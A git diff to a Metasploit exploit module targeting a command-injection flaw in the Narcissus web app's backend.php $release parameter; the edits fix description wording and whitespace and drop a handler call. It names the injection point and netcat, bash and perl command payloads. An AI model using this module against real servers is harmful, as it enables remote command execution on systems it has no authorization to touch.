diff --git a/modules/exploits/unix/webapp/narcissus_backend_exec.rb b/modules/exploits/unix/webapp/narcissus_backend_exec.rb index 6b054e0930..8c156efb5b 100644 --- a/modules/exploits/unix/webapp/narcissus_backend_exec.rb +++ b/modules/exploits/unix/webapp/narcissus_backend_exec.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => "Narcissus Image Configuration Passthru Vulnerability", 'Description' => %q{ - This module exploits a vulnerability found in Narcissus' image configuration + This module exploits a vulnerability found in Narcissus image configuration function. This is due to the backend.php file not handling the $release parameter properly, and then passes it on to the configure_image() function. In this function, the $release parameter can be used to inject system commands for @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby python bash netcat-e' - }, + }, 'Targets' => [ ['Narcissus', {}] @@ -104,7 +104,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit print_status("#{peer} - Sending malicious request...") remote_exe(payload.encoded) - handler end